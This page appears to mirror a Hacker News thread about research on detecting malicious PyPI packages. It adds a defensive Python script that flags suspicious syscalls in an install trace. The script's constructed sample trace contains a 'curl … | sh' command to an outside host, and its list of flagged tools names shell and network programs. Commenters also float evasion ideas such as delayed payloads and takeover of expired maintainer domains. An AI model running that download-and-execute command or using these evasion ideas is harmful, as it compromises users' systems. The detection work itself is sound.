Tech Echo (科技回声): a Hacker News mirror built on Next.js, carrying the global tech news and discussion threads.
Hunting for Malicious Packages on PyPI

179 points, posted by mef, over 4 years ago

6 comments

jwcrux, over 4 years ago

Hey friends! Author here.

If you're looking for a tl;dr you can find one on Twitter (with pictures!) [0]

This research was a blast to do, and I learned a ton. Happy to answer questions!

[0] https://twitter.com/jw_sec/status/1326908628411047937
forsaken, over 4 years ago

One of the PyPI maintainers noted:

> This is a great approach to detecting malicious code execution in Python packages.

> ... anyone want to fund making this part of @pypi?

https://twitter.com/di_codes/status/1327121326734241797

I think this is an obvious place that someone in the ecosystem could apply money and make their supply chain (and everyone else's) safer.

[reply #25083601 not loaded]
codezero, over 4 years ago

Something that just occurred to me - has anyone checked registries for owners with email addresses on either expired domains, or now-available public domain addresses?

This seems like a ripe angle for package take-over.

[reply #25084948 not loaded]
kortex, over 4 years ago

> I still don't like that it's possible to run arbitrary commands on a user's system just by them pip installing a package.

Is there a build system out there that doesn't have this feature? Pip is both a package manager and a build system, since many packages are compiled at install time.

[reply #25083796 not loaded]
nmstoker, over 4 years ago

Looks like a great initiative, and glad to hear this is getting attention.

The technique of observing syscalls has clear benefits. However, might there be ways of evading this simply by setting up some kind of delayed process, so the syscall doesn't happen during the observation window, or is only triggered rarely or on certain combinations that might not typically be tested (meaning it could still be caught in theory, but the chances are much lower)?

[reply #25088434 not loaded]
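As an added illustration of the two points raised in kortex's and nmstoker's comments (install-time code execution via setup.py, and the limits of observing syscalls during an install window), the script below scans strace-style syscall lines for the events a reviewer would want to see. It is example code written for this page, not the article's tooling, and it does not reproduce whatever the original research actually ran. The trace lines are constructed, not a real capture; the set of "suspicious" programs, the non-loopback `connect` rule and the long-sleep heuristic are this example's own assumptions. The long-sleep rule is only a partial answer to nmstoker's evasion concern: a package that delays or conditions its payload on something the sandbox never triggers leaves no syscall to see, so the heuristic flags the delay primitive itself rather than the behaviour behind it.

```python
"""Flag suspicious syscalls in an strace-style capture of a package install."""
import re
from collections import Counter
from dataclasses import dataclass
from ipaddress import ip_address

# Constructed sample in the shape of `strace -f` output (pid, syscall, args, result).
# It is NOT a real capture: it models `python3 setup.py install` forking a shell that
# downloads and runs a script, plus a helper process that sleeps for a day.
SAMPLE_TRACE = """\
1001 execve("/usr/bin/python3", ["python3", "setup.py", "install"], 0x7ffd3a) = 0
1001 openat(AT_FDCWD, "setup.py", O_RDONLY|O_CLOEXEC) = 3
1001 connect(4, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("127.0.0.1")}, 16) = 0
1001 clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|SIGCHLD, child_tidptr=0x7f1) = 1002
1002 execve("/bin/sh", ["sh", "-c", "curl http://203.0.113.10/x | sh"], 0x55c0) = 0
1002 connect(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("203.0.113.10")}, 16) = 0
1002 connect(5, {sa_family=AF_INET6, sin6_port=htons(443), sin6_flowinfo=htonl(0), inet_pton(AF_INET6, "2001:db8::1", &sin6_addr), sin6_scope_id=0}, 28) = 0
1003 clock_nanosleep(CLOCK_REALTIME, 0, {tv_sec=86400, tv_nsec=0}, NULL) = 0
"""

# Line shapes follow strace's default formatting for these three syscalls.
EXECVE_RE = re.compile(r'^(\d+)\s+execve\("([^"]+)",\s*\[(.*?)\]')
CONNECT_RE = re.compile(
    r'^(\d+)\s+connect\(.*?sa_family=AF_INET6?,.*?port=htons\((\d+)\),.*?"([0-9a-fA-F.:]+)"'
)
SLEEP_RE = re.compile(r'^(\d+)\s+(?:clock_)?nanosleep\(.*?tv_sec=(\d+)')

# Assumption: programs a build step has little legitimate reason to spawn.
SUSPICIOUS_PROGRAMS = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc"}
# Assumption: a sleep this long inside an install is more likely to be a delay
# past the observation window than a build step.
LONG_SLEEP_SECONDS = 3600


@dataclass
class Finding:
    pid: int
    kind: str
    detail: str


def scan_trace(trace: str) -> list[Finding]:
    """Return one Finding per suspicious execve / connect / nanosleep line."""
    findings: list[Finding] = []
    for line in trace.splitlines():
        m = EXECVE_RE.match(line)
        if m:
            pid, path, argv = int(m.group(1)), m.group(2), m.group(3)
            if path.rsplit("/", 1)[-1] in SUSPICIOUS_PROGRAMS:
                findings.append(Finding(pid, "suspicious_exec", f"{path} [{argv}]"))
            continue
        m = CONNECT_RE.match(line)
        if m:
            pid, port, addr = int(m.group(1)), int(m.group(2)), m.group(3)
            # Loopback traffic (e.g. a local build server) is left alone; anything
            # else reaching out during an install is worth a look.
            if not ip_address(addr).is_loopback:
                findings.append(Finding(pid, "outbound_connect", f"{addr}:{port}"))
            continue
        m = SLEEP_RE.match(line)
        if m:
            pid, secs = int(m.group(1)), int(m.group(2))
            if secs >= LONG_SLEEP_SECONDS:
                findings.append(Finding(pid, "long_sleep", f"{secs}s sleep during install"))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings by kind, for a quick triage line per package."""
    return dict(Counter(f.kind for f in findings))


if __name__ == "__main__":
    for f in scan_trace(SAMPLE_TRACE):
        print(f"pid {f.pid}: {f.kind}: {f.detail}")
    print(summarize(scan_trace(SAMPLE_TRACE)))
```

Note what the sample makes visible and what it does not: the shell spawned under `setup.py install` and its outbound connections are caught because they happen inside the traced window, which is exactly the install-time execution kortex describes. The day-long sleep is flagged only because the delay primitive itself is observable; a payload keyed to a date, a hostname or a rarely used import path would produce no flagged line at all.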
1e, over 4 years ago

I really enjoyed this write-up. I am glad someone far smarter than me is thinking about this problem.